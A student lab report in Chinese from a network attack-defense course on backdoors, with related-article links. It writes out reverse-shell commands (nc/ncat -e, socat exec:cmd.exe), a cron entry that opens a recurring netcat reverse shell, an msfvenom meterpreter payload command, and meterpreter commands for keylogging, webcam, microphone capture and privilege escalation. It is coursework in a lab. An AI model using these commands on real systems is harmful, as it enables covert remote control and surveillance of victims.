2018-2019-2 网络对抗技术 20165305 Exp2 后门原理与实践
常用后门工具
一、Windows获得Linux Shell
在Windows下使用ipconfig查看本机IP
使用ncat.exe程序监听本机的5305端口
在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5305端口
成功获得Kali的shell
如下图所示



二、Linux获得Windows Shell
在Kali环境中使用ifconfig查看IP:

使用nc指令监听5305端口:

在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的5305端口:

Kali下可以看到Windows的命令提示,可以输入Windows命令:

三、使用nc传输数据
Windows下监听5305端口
Kali下连接到Windows的5305端口
建立连接之后,就可以传输数据了
如下图:


实验内容
一、使用netcat获取主机操作Shell,cron启动
在Windows系统下,监听5305端口:

用crontab -e指令编辑一条定时任务
在最后一行添加35 * * * * /bin/netcat 192.168.1.176 5305 -e /bin/sh,意思是在每个小时的第45分钟反向连接Windows主机的5305端口:

当时间到了11点35时,此时已经获得了Kali的shell,可以输入指令:

二、使用socat获取主机操作Shell, 任务计划启动
在win10系统下,右击屏幕左下角windows图标,选择“计算机管理”。
在任务计划程序创建任务,填写任务名称,并新建一个触发器。

在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5305 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5305,同时把cmd.exe的stderr重定向到stdout上:

创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行:

此时,在Kali环境下输入指令socat - tcp:192.168.1.176:5305,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的端口,此时可以发现已经成功获得了一个cmd shell:

三、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.91.133 LPORT=5303 -f exe > 20155303_backdoor.exe
生成后门程序:

在Windows下执行ncat.exe -l 5305 > 20165305_backdoor.exe

通过nc指令将生成的后门程序传送到Windows主机上:

在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:


设置完成后,执行监听:
运行Windows下的后门程序:
此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:


四、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容
使用record_mic指令可以截获一段音频:
使用webcam_snap指令可以使用摄像头进行拍照:
使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:
使用screenshot指令可以进行截屏:
使用getuid指令查看当前用户,使用getsystem指令进行提权




基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
密码破解后门,当自己的秘密强度很弱的话,很容易被别人破解进入自己的系统。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
当主机处于睡眠状态也就是代表着这时没有人使用电脑时自启动。
(3)Meterpreter有哪些给你映像深刻的功能?
使用netcat获取主机操作Shell,cron启动,添加35 * * * * /bin/netcat 192.168.1.176 5305 -e /bin/sh,在每个小时的第35分钟反向连接Windows主机的5305端口,获去被控主机的音频、图像等
(4)如何发现自己有系统有没有被安装后门?
一般就是下载网络安全的软件,例如360,实时监控与检测。
还有就是检查自己的注册表里的信息是否有异常的。
实验总结
我认为本次试验自己的收获很大。通过本次试验让我了解了系统中一些简单的后门,更明白了后门的作用与危害,加强了自己对后门的安全防护意识。
2018-2019-2 网络对抗技术 20165305 Exp2 后门原理与实践的更多相关文章
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
- 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...
- 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...
- 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...
- 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...
随机推荐
- Java Web 浏览器关闭后Session就会被销毁吗?
浏览器关闭后Session就会被销毁吗? Session是JSP的九大内置对象(也称为隐含对象)中的一个,用于保存当前用户的状态信息,初学者可能认为Session的生命周期是从打开一个浏览器发送请求到 ...
- 201771010118《面向对象程序设计(java)》第四周学习总结
1.实验目的与要求 (1) 理解用户自定义类的定义: (2) 掌握对象的声明: (3) 学会使用构造函数初始化对象: (4) 使用类属性与方法的使用掌握使用: (5) 掌握package和import ...
- __x__(21)0907第四天__ css 盒模型 (框模型)
CSS 处理元素,把每个元素都包含在一个盒子里. 对网页的布局,其实就是对盒子的摆放及设置. 边框border,会使盒子变大: .box{ border: 10px 20px 30px 40px r ...
- git-format-patch
使用方法: git diff ${old-commit} ${new-commit} > commit-operation.patch OR git format- b1af44f > c ...
- 逆向工程-真码保存在系统文件破解QQ游戏对对碰助手
1)注册栏中输入任意值测试 1.2)记录弹出的关键字对话框 2.1)发送至PEID进行查壳 2.2)发现无壳 2.3)将软件载入OllyDBG程序 2.4)在反汇编栏下右键选择中文搜索引擎->智 ...
- 泡泡一分钟:Cooperative Object Transportation by Multiple Ground and Aerial Vehicles: Modeling and Planning
张宁 Cooperative Object Transportation by Multiple Ground and Aerial Vehicles: Modeling and Planning 多 ...
- linux 软链接和硬链接的区别 和 inode 的理解
软连接和硬连接的区别:1.创建的方式不同软:ln -s 源文件 连接名硬:ln 源文件 连接名 2.原理不同,和删除源文件对其的影响.硬连接的inode节点和源文件的inode节点一样.也就是同一个i ...
- html中不常用但必须知道的标签
1.<b>加粗</b> 为天地立心,为生民立命,为往圣继绝学,为万世开太平 2.<s>删除线</s> 为天地立心,为生民立命,为往圣继绝学,为万世开太平 ...
- Mac学习
碰到问题可以多查看帮助文件 快速上手 1,自动隐藏顶端菜单栏: 通用-> 外观 menu bar 2,docker 程序坞,左边为应用程序,右边是文件或者文件夹,38线 3,option -&g ...
- Windows命令行设置dns
管理员运行cmd 1.dns配置成192.168.1.200 netsh interface ip set dns name="以太网" source=static addr=19 ...